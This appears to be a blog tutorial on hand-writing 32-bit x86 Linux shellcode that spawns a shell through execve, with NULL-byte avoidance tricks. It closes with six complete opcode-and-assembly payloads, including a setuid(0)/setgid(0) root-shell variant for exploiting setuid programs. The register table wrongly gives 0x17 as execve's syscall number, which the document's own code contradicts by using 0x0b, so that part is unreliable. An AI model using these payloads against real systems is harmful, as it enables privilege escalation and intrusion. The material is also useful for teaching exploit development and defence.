Shellcode | BinaryMagi Inc.

DISCLAIMER: I'm not responsible for anything stupid you do with this information. This is for educational purposes only!

Shellcode is exploit payload meant to produce a command shell for the attacker. The most common use is exploiting setuid programs to produce a root shell; however, in many cases any shell at all is further than one is meant to be allowed to go.

The standard shellcode is effectively the equivalent of:

   execve("/bin/sh", ["/bin/sh"], []);

There are catches, though:

Absolutely no NULL bytes may be present. (value of 0x00) A NULL byte denotes the end of a string and this will usually cause the shellcode to be only partially transferred into where it needs to go. gets(), for example, is an easily exploitable function; however, it will stop pushing data into the target when it encounters a NULL.
As few instructions as possible. The smaller the code, the more likely you'll be able to wedge it into where it needs to go. (Small strings, GOTs, etc.) Some delivery methods multiply the size of the shellcode by several times so every byte counts.

These are the target values for the registers:

%eax	This should equal 0x17 which is the value for the execve() function. It may be enough for just %al=0x17 but I haven't tested this and wouldn't trust it.
%ebx	The value of %esp after you've pushed the /bin/sh string onto the stack. This is where the 1st function parameter is stored which is a string pointer to the execution target.
%ecx	The second parameter is an array of arguments to pass to the execution target. /bin/sh doesn't need any; however, argv[0] is supposed to contain the name of the execution target itself so we still need a single value array. We can cheat, though, and reuse the address to the string in %ebx. 0x00 sometimes works but it's not POSIX and inconsistent across platforms. That being said, if you can use it, you can trim a few bytes off.
%edx	The third parameter is an array of environment variable values. You can set this one to 0x00 too but that runs the risk of the new shell inheriting an existing environment and that is a big unknown. Instead, it's better to put the stack address of a NULL value in here. It should be safe to reuse the one you used to terminate the string used by the %ebx and %ecx parameters.

Most shellcode accomplishes this with the same basic steps:

1. Zero Out Registers Without Using Zeros

Zeroing out a register is tricky since we can't have any NULL bytes in our resulting opcodes. There are a few tricks out there to do this.

The first and most simple is XORing a register with itself. This works on any of the registers.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself always yields 0's

That's 2 bytes per register. There are some ways you can trim that, though. This way first purges %ecx and then multiplies the 64 bit psuedo-register %edx:eax by it. Zero times anything is zero so 3 clean registers in only 4 bytes of code.

 31 c9    xor %ecx,%ecx   ;; XOR %ecx with itself => 0
 f7 e1    mul %ecx        ;; Multiply %edx:eax by %ecx

You don't need to zero out all 4 registers, though. Only %eax absolutely needs it - any others are just for convenience. For example, because %edx:eax is a special 64bit register, you can purge both sides with only 3 bytes instead of 4. This only works for these 2 registers but it's really all you need.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself
 99       cdq             ;; Extend sign bit in %eax (0) through %edx

An especially creative method I've found also works only for %eax and %edx but it combines purging them with setting %eax to its eventual value - all in only 4 bytes.

 6a 0b    push $0x0b      ;; push execve() onto the stack
 58       pop %eax        ;; eax := execve()
 99       cdq             ;; edx := 0

By pushing & popping from the stack, the higher 3 bytes of the register are automatically flushed out. cdq then extends those 0's all the way up through %edx.

Again, we only absolutely need to purge %eax. The others should eventually contain memory addresses and can therefore be populated by instructions that affect all 32 bits of the register. While populating the stack, though, we will need something with NULL bytes in it to refer to since we cannot include any NULLs in the shellcode itself. This final code block is a good example of why we may want to purge more than just %eax. If we don't purge %edx as well, we would need to wait until the very end of the shellcode to set %eax to its eventual value. By then, however, we couldn't pop it from the stack anymore because there would then be a lot of other stuff on top.

2. Set Appropriate Register & Stack Values

%eax

If you still wish to set %eax at an arbitrary time, this would do it. It must be zeroed out first, though.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself
    ...arbitrary operations here - just don't mess up %eax...
 b0 0b    mov $0x0b,%al   ;; eax := execve()

If we tried to just set all 32 bits of %eax to 0x0b instead of flushing it 1st and then setting only %al, not only would it be more bytes but it would also include the 3 NULLs needed to pad out the higher bytes of the register. The former may just be unfortunate but the latter is a deal breaker. This is a good example of why standard compilers are inappropriate for developing shellcode - neither are an issue with regular code.

%ebx

The 1st parameter to execve() nearly always looks the same - a call to /bin/sh as that is the only shell that convention guarantees to be there. We need to be careful of our NULL bytes, though, so we need string lengths that are multiples of 4 and the string-terminating NULL to come from one of our purged registers. Fortunately UNIX doesn't care about redundant slashes so we'll bulk that out to '/bin//sh' instead. ('//bin/sh' works just as well)

 52               push %edx          ;; push some register containing \0 (in this case %edx) onto the stack
 68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
 68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack

The order is backwards because it's a stack. The string-terminating NULL is pushed on from a register that we zeroed out earlier. Basically, you can call any shell you wish so long as the path string length is a factor of 4 and this is trivial to do because you can have as many redundant slashes as you need.

Once the string is onto the stack, its address is stored in %ebx. This is equivalent to passing in a pointer to a string in C.

 89 e3     mov %esp,%ebx   ;; ebx := pointer to "/bin//sh" on stack

%ecx / %edx

The 2nd and 3rd parameters in %ecx and %edx aren't really important and can often just be NULL; however, this violates POSIX and sometimes won't work. If you're on a system where NULL does work then it's trivial to zero them out. Otherwise, you can creatively use what has already been pushed onto the stack to populate them.

Parameter 2 is the argv array. An array is just a list of memory addresses terminated with a NULL. Our array is just ["/bin/sh"] though - argv[0] with no parameters - so we can create an array that reuses the string stored in %ebx for the 1st parameter.

 52        push %edx       ;; push some register containing \0 (in this case %edx) onto stack
 53        push %ebx       ;; push pointer to "/bin//sh" onto stack
 89 e1     mov %esp,%ecx   ;; ecx := pointer to argv array on stack

In fact, while we're at it, the 3rd parameter is even easier - it's just an empty array. We can use the terminating NULL at the end of the 2nd parameter's array and pretend it's a 3rd, empty array for %edx. It needs to happen before we push the address to the string onto the stack, though, or the stack pointer will move. The code above becomes:

 52        push %edx       ;; push some register containing \0 (in this case %edx) onto stack
 89 e2     mov %esp,%edx   ;; edx := pointer to empty array on stack
 53        push %ebx       ;; push pointer to "/bin//sh" onto stack
 89 e1     mov %esp,%ecx   ;; ecx := pointer to argv array on stack

Those 2 extra bytes ensure a clean environment in our new shell instead of inheriting who-knows-what from the parent.

3. Execute execve()

With all 4 registers properly filled and the required parameter data on the stack, the final step is to execute.

 cd 80     int $0x80

This executes a software interrupt. UNIX then looks in %eax to see which one - in our case execve() - and calls it. Valid values for %eax can be found in /usr/include/asm/unistd_32.h

Examples

Only the first 2 of these are my own - the rest were written by others. My apologies for not giving them credit but rarely do you find a shellcode example whose author makes his- or herself known.

A simple, POSIX-compliant example. Result is 25 bytes long.

;; execve("/bin//sh", ["/bin//sh"], []);
6a 0b            push $0x0b         ;; push execve() onto the stack
58               pop %eax           ;; eax := execve()
99               cdq                ;; edx := 0
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
52               push %edx          ;; push \0 onto stack
89 e2            mov %esp,%edx      ;; edx := pointer to empty array on stack
53               push %ebx          ;; push pointer to "/bin//sh" onto stack
89 e1            mov %esp,%ecx      ;; ecx := pointer to argv array on stack
cd 80            int $0x80          ;; FIRE!

Fully POSIX-compliant and includes setuid() and setgid() calls. It will segfault if run as any user but root. Result is 37 bytes.

31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0

;; setuid(0);
b0 17            mov $0x17,%al      ;; eax := setuid
89 cb            mov %ecx,%ebx      ;; ebx := 0
cd 80            int $0x80          ;; FIRE 1!

;; setgid(0);
b0 2e            mov $0x2e,%al      ;; eax := setgid
cd 80            int $0x80          ;; FIRE 2!

;; execve("/bin//sh", ["/bin//sh"], []);
b0 0b            mov $0x0b,%al      ;; eax := execve
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
52               push %edx          ;; push \0 onto stack
89 e2            mov %esp,%edx      ;; edx := pointer to empty array on stack
53               push %ebx          ;; push pointer to "/bin//sh" onto stack
89 e1            mov %esp,%ecx      ;; ecx := pointer to argv array on stack
cd 80            int $0x80          ;; FIRE 3!!!

Simple. Mostly complete but not POSIX. Result is 21 bytes.

;; execve("/bin//sh", NULL, NULL);
6a 0b            push $0x0b         ;; push execve onto stack
58               pop %eax           ;; eax := execve
99               cdq                ;; edx := 0
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
31 c9            xor %ecx,%ecx      ;; ecx := 0
cd 80            int $0x80          ;; FIRE!

Simple. Mostly complete but not POSIX. Result is 21 bytes.

;; execve("/bin//sh", NULL, NULL);
31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0
b0 0b            mov $0x0b,%al      ;; eax := execve
51               push %ecx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
cd 80            int $0x80          ;; FIRE!

Meant for raw size. The result is only 14 bytes but it requires you already be able to modify some directory in the PATH. (upload a binary via FTP, create a symlink via a shell, etc.) Rather than calling '/bin/sh', it simply calls 'a' which has been somehow connected to a shell binary.

;; execve("a", NULL, NULL);
31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0
50               push %eax          ;; \0 onto stack
6a 61            push $0x61         ;; 'a' onto stack
89 e3            mov %esp,%ebx      ;; ebx := stack addr for "a"
50               push %eax          ;; \0 onto stack
b0 0b            mov $0x0b,%al      ;; eax := execve
cd 80            int $0x80          ;; FIRE!

This one reuses an existing string containing "/bin/sh" somewhere in the .rodata of the exploitable binary. The result is 16 bytes and requires no ability to push files, create symlinks, etc.; however, it does require that you know exactly where inside the binary the string resides and that the address of that string not contain any NULL bytes.

;; execve(*(0x08048408), [*(0x08048408)], NULL);
31 c0            xor %eax,%eax          ;; eax := 0
99               cdq                    ;; edx := 0
bb 08 84 04 08   mov $0x08048408,%ebx   ;; ebx := addr to string in .rodata containing "/bin/sh" - change it
50               push %eax              ;; \0 onto stack
53               push %ebx              ;; addr to "/bin/sh" onto stack
89 e1            mov %esp,%ecx          ;; ecx := pointer to argv array in stack
b0 0b            mov $0x0b,%al          ;; eax := execve
cd 80            int $0x80              ;; FIRE!

The key is to be creative - think of it as a lateral thinking puzzle and see how many different ways there are to accomplish the same thing. Have fun!